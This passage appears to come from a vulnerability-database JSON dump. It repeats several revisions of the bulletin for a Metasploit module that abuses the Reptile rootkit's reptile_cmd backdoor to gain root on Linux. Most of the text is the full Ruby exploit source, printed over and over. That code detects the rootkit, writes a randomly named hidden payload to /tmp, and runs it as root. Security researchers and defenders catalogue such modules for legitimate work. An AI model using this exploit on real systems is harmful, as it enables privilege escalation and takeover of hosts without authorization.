"AKAMAIBLOG:C765C478B0284B32665C621EE48DFA6A"]}, {"type": "slackware", "idList": ["SSA-2020-024-01"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB"]}, {"type": "thn", "idList": ["THN:3D96296BBD9F03492FECEEC3BB44043C"]}], "modified": "2020-01-25T15:40:41"}, "score": {"value": 4.1, "vector": "NONE", "modified": "2020-01-25T15:40:41"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-25T15:40:41", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-25T17:41:35", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:E8652E1BB040732546FCCC69B1A525B7"]}, {"type": "github", "idList": ["GHSA-GP2M-7CFP-H6GF"]}, {"type": "cve", "idList": ["CVE-2019-1414", "CVE-2019-19363", "CVE-2019-18900", "CVE-2019-3699", "CVE-2019-3697", "CVE-2019-3694", "CVE-2019-3693", "CVE-2019-3692", "CVE-2019-3687"]}, {"type": "kitploit", "idList": ["KITPLOIT:6686070506690737506", "KITPLOIT:2194899363630238471"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5580DA521260B9BF8D9070DC80D90F12"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:236909F7E19DCF673F9C6AC2C32F6E51", "AKAMAIBLOG:C765C478B0284B32665C621EE48DFA6A"]}, {"type": "slackware", "idList": ["SSA-2020-024-01"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB"]}, {"type": "thn", "idList": ["THN:3D96296BBD9F03492FECEEC3BB44043C"]}], "modified": "2020-01-25T17:41:35"}, "score": {"value": 4.1, "vector": "NONE", "modified": "2020-01-25T17:41:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-25T17:41:35", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-26T21:49:04", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:3820905199340496468", "KITPLOIT:6468046440149896275", "KITPLOIT:6686070506690737506", "KITPLOIT:2194899363630238471"]}, {"type": "cve", "idList": ["CVE-2020-3115", "CVE-2019-16005", "CVE-2019-1414", "CVE-2019-19363", "CVE-2019-18900", "CVE-2019-3699", "CVE-2019-3697"]}, {"type": "thn", "idList": ["THN:544AA5D50810C432293C5A46CD0B36BB"]}, {"type": "threatpost", "idList": ["THREATPOST:E8652E1BB040732546FCCC69B1A525B7"]}, {"type": "github", "idList": ["GHSA-GP2M-7CFP-H6GF"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5580DA521260B9BF8D9070DC80D90F12"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:236909F7E19DCF673F9C6AC2C32F6E51", "AKAMAIBLOG:C765C478B0284B32665C621EE48DFA6A"]}, {"type": "slackware", "idList": ["SSA-2020-024-01"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB"]}], "modified": "2020-01-26T21:49:04"}, "score": {"value": 3.6, "vector": "NONE", "modified": "2020-01-26T21:49:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-26T21:49:04", "differentElements": ["sourceData"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-26T23:58:30", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:3820905199340496468", "KITPLOIT:6468046440149896275", "KITPLOIT:6686070506690737506", "KITPLOIT:2194899363630238471"]}, {"type": "cve", "idList": ["CVE-2020-3115", "CVE-2019-16005", "CVE-2019-1414", "CVE-2019-19363", "CVE-2019-18900", "CVE-2019-3699", "CVE-2019-3697"]}, {"type": "thn", "idList": ["THN:544AA5D50810C432293C5A46CD0B36BB"]}, {"type": "threatpost", "idList": ["THREATPOST:E8652E1BB040732546FCCC69B1A525B7"]}, {"type": "github", "idList": ["GHSA-GP2M-7CFP-H6GF"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5580DA521260B9BF8D9070DC80D90F12"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:236909F7E19DCF673F9C6AC2C32F6E51", "AKAMAIBLOG:C765C478B0284B32665C621EE48DFA6A"]}, {"type": "slackware", "idList": ["SSA-2020-024-01"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB"]}], "modified": "2020-01-26T23:58:30"}, "score": {"value": 4.1, "vector": "NONE", "modified": "2020-01-26T23:58:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-26T23:58:30", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-31T08:01:50", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "f5", "idList": ["F5:K53737506"]}, {"type": "mssecure", "idList": ["MSSECURE:9FC0B7963F9AFCB1D44D9117228479ED"]}, {"type": "threatpost", "idList": ["THREATPOST:EDC258873068248FDDF2C325735EF100"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E"]}, {"type": "thn", "idList": ["THN:FE11DF5FD21913ABB0A26444842D05EA"]}, {"type": "cve", "idList": ["CVE-2020-8446", "CVE-2020-8448"]}, {"type": "exploitdb", "idList": ["EDB-ID:47984"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310853019", "OPENVAS:1361412562310853020"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5528"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2084.NASL", "DEBIAN_DLA-2083.NASL", "DEBIAN_DLA-2081.NASL", "DEBIAN_DLA-2082.NASL", "CENTOS_RHSA-2020-0262.NASL", "DEBIAN_DLA-2079.NASL", "FORTIOS_FG-IR-19-217.NASL", "CENTOS_RHSA-2020-0199.NASL"]}], "modified": "2020-01-31T08:01:50"}, "score": {"value": 5.6, "vector": "NONE", "modified": "2020-01-31T08:01:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-31T08:01:50", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-31T09:35:05", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "f5", "idList": ["F5:K53737506"]}, {"type": "cve", "idList": ["CVE-2020-8092", "CVE-2020-8446", "CVE-2020-8448"]}, {"type": "mssecure", "idList": ["MSSECURE:9FC0B7963F9AFCB1D44D9117228479ED"]}, {"type": "threatpost", "idList": ["THREATPOST:EDC258873068248FDDF2C325735EF100"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E"]}, {"type": "thn", "idList": ["THN:FE11DF5FD21913ABB0A26444842D05EA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310853019", "OPENVAS:1361412562310853020"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5528"]}, {"type": "nessus", "idList": ["OPENSUSE-2020-121.NASL", "OPENSUSE-2020-124.NASL", "FORTIOS_FG-IR-19-217.NASL", "DEBIAN_DLA-2084.NASL", "DEBIAN_DLA-2083.NASL", "DEBIAN_DLA-2081.NASL", "DEBIAN_DLA-2082.NASL", "CENTOS_RHSA-2020-0262.NASL"]}], "modified": "2020-01-31T09:35:05"}, "score": {"value": 5.4, "vector": "NONE", "modified": "2020-01-31T09:35:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-31T09:35:05", "differentElements": ["sourceData"], "edition": 17}, {"bulletin": {"id": 